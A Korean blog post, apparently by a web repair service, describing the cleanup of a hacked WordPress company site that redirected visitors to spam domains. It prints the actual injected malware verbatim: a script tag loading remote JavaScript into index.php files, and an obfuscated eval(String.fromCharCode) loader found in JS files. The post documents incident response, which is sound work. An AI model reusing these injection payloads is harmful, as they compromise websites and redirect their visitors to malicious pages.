CCTV 공사, 네트워크공사, 방송음향설비 공사를 주로 하고 있는 회사홈페이지가 해킹을 당해 악성코드 멀웨어에 감염이 되어 긴급 복구 요청이 들어왔습니다. 확인을 해보니 홈페이지 접속시 다른 사이트로 이동이 되고 있었고, FTP 로 접속을 해보니 주 실행파일이 index.php 들과 js 파일들이 악성코드에 감염이 되어있었습니다. 악성코드만 제거를 하면 정상적으로 실행이 될것으로 판단하여 복구 작업을 진행하였습니다.
이번에 감염된 증상을 보면 기존과는 다르게 인덱스 파일 위주로 감염이 되어있고, 워드프레스코어, 플러그인, 테마 전 영역에 걸쳐 악성코드에 감염이 되어 사용자화면 뿐만 아니라 워드프레스 관리자에서도 외부 사이트로 이동되는 증상이 생겼습니다. 호스팅은 닷홈 ( dothome ) 이었고, 테마는 더세븐, 플러그인은 게시판 플러그인을 비롯해 20여개가 설치되어있었습니다.
– 호스팅 : 닷홈 ( https://www.dothome.co.kr )
– 테마 : 더세븐 ( the7 )
– 플러그인 : 케이보드, 망보드, 아키스멧, 콘택트폼7, 플로트메뉴, 비주얼콤포저 등
먼저 증상은 홈페이지에 접속을 하면 다음과 같은 사이트로 자동으로 이동이 되는 것이었습니다.
https://generallocationgo.com/?p=geytkmrwgi5gi3bpg42te&sub1=Ldashai&sub2=newway.n1&a=a# https://dreamteammyfriend.com/?p=mmzdkyrxme5gi3bpge4dg&sub1=Xuaran&sub2=newway.v1&z=z# https://video457.club/s6300/l16/demo.v1::: https://cnews-me4.club/s6300/l16/demo.v1::: https://cnews-me1.club/s6300/l16/demo.v1:::
감염 형태를 살펴보니 워드프레스코어, 플러그인, 테마의 index.php 파일과 js 파일들이 전부 악성코드에 감염이 되어있었습니다.
정상적인 index.php 파일 내
<?php // Silence is golden.
악성코드에 감염된 index.php 파일내용
<script type='text/javascript' async src='https://css.chatwithgreenbar.com/sjquery.min.js?style=prime&'></script><?php // Silence is golden.
js 파일에 들어있는 악성코드
var gfhfgjj24 = 1; eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 48, 52, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 54, 44, 32, 49, 48, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 57, 56, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 46, 115, 99, 114, 105, 112, 116, 46, 109, 105, 110, 46, 106, 115, 63, 115, 116, 121, 108, 101, 61, 115, 99, 114, 105, 112, 116, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));jQuery( function ( $ ) {
모든 파일에 감염된 악성코드를 제거하는 작업을 진행하였고, 작업 후에는 홈페이지가 정상적으로 접속이 되었습니다.
워드프레스 해킹 복구 및 악성코드 제거 작업 후에는 재감염을 방지하기위해 보안최적화 작업을 추천드립니다. 이번에는 보안최적화 작업은 직접 하시겠다고 하셔서 따로 보안최적화 작업은 해드리지 않았지만, 관리자 접속 주소만 변경을 부탁하셔서 접속주소만 기존 /wp-admin 에서 /임의의 주소 로 변경해드린 후 작업을 마무리 했습니다.
가끔 출몰하더군요 ㅠㅠ